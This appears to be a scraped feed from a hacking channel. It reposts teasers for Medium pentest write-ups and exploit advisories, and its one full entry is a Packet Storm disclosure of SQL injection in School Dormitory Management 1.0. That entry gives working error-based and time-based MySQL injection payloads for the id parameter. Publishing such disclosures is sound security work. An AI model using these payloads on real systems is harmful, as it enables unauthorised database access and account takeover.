Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Windows Recon: Host Discovery
https://cdn-images-1.medium.com/max/1396/1*F2YJGZLIgZASmDQiuoGMkg.jpeg
Hello, today I will show you some of the ways in which we can perform a host discovery in windows.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Windows Recon: Host Discovery
https://cdn-images-1.medium.com/max/1396/1*F2YJGZLIgZASmDQiuoGMkg.jpeg
Hello, today I will show you some of the ways in which we can perform a host discovery in windows.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Windows Recon: Host Discovery
Hello, today I will show you some of the ways in which we can perform a host discovery in windows.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
BOUNTYHUNTER — HackTheBox WriteUp
https://cdn-images-1.medium.com/max/917/1*3RFOLUGPunmyD_6c441N-Q.png
BOUNTYHUNTER is a LINUX machine of EASY difficulty.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
BOUNTYHUNTER — HackTheBox WriteUp
https://cdn-images-1.medium.com/max/917/1*3RFOLUGPunmyD_6c441N-Q.png
BOUNTYHUNTER is a LINUX machine of EASY difficulty.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
BOUNTYHUNTER — HackTheBox WriteUp
BOUNTYHUNTER is a LINUX machine of EASY difficulty.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: [Day 24] Post Exploitation Learning From The Grinch
https://cdn-images-1.medium.com/max/1920/1*psaTaSfd9sQyajFeYTLO-w.png
What is the username of the other user on the system?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe: [Day 24] Post Exploitation Learning From The Grinch
https://cdn-images-1.medium.com/max/1920/1*psaTaSfd9sQyajFeYTLO-w.png
What is the username of the other user on the system?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe: [Day 24] Post Exploitation Learning From The Grinch
What is the username of the other user on the system?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox:Late
https://cdn-images-1.medium.com/max/1400/1*W655NiG3jUXVPZvaTfhWfg.png
Overview:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox:Late
https://cdn-images-1.medium.com/max/1400/1*W655NiG3jUXVPZvaTfhWfg.png
Overview:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox:Late
Overview:
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
RaidForums was crumbling before its DOJ takedown — here’s why
https://cdn-images-1.medium.com/max/2500/1*QZcCwVX2ejqQgJUVAighYw.png
Cybercriminals are selling “exclusive” stolen data to multiple customers, threatening the stability of illicit marketplaces before even…
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
RaidForums was crumbling before its DOJ takedown — here’s why
https://cdn-images-1.medium.com/max/2500/1*QZcCwVX2ejqQgJUVAighYw.png
Cybercriminals are selling “exclusive” stolen data to multiple customers, threatening the stability of illicit marketplaces before even…
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
Medium
RaidForums was crumbling before its DOJ takedown — here’s why
Cybercriminals are selling “exclusive” stolen data to multiple customers, threatening the stability of illicit marketplaces before even…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Tools: Metasploit
https://cdn-images-1.medium.com/max/2000/0*IVgDiI2tJcnX11hp
Dear friend, welcome to HaXeZ where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Tools: Metasploit
https://cdn-images-1.medium.com/max/2000/0*IVgDiI2tJcnX11hp
Dear friend, welcome to HaXeZ where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Tools: Metasploit
Dear friend, welcome to HaXeZ where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
School Dormitory Management 1.0 SQL Injection
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png
School Dormitory Management version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
School Dormitory Management 1.0 SQL Injection
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png
School Dormitory Management version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
d5de6e90441b347a90dcfbbe5aa109c73945042d00234b05626402f8ca6fabd9Download
## Title: School Dormitory Management 1.0 SQLi
## Author: nu11secur1ty
## Date: 05.09.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management
## Description:
The id parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error
message was returned.
Two single quotes were then submitted and the error message disappeared.
The attacker can take administrator accounts control and also of all
accounts on this system, also the malicious user can download all
information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 7198 FROM(SELECT
COUNT(*),CONCAT(0x716b7a6a71,(SELECT
(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)
## Proof and Exploit:
[href](https://streamable.com/hd6xo1)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
School Dormitory Management 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Travel Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Travel Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Travel Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.